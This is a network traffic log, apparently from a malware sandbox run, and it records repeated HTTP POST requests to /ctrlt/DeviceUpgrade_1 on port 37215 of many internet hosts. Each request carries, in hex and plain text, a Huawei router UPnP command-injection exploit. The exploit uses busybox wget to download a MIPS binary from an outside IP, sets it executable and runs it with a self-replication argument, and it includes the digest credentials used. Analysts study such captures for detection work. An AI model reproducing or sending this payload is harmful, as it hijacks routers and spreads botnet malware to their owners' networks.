3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1913192.168.2.134304412.15.61.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551347971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1914192.168.2.1356612176.73.90.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551393032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1915192.168.2.135471041.157.230.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551676035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1916192.168.2.1340622211.3.164.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551733971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1917192.168.2.1334446197.201.10.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551734924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1918192.168.2.1354036157.52.3.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551762104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1919192.168.2.1345078197.91.190.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551773071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1920192.168.2.1360160131.209.235.19937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551794052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1921192.168.2.134462241.71.210.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551825047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1922192.168.2.1348562199.241.94.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551825047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1923192.168.2.1351868197.79.103.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.551857948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
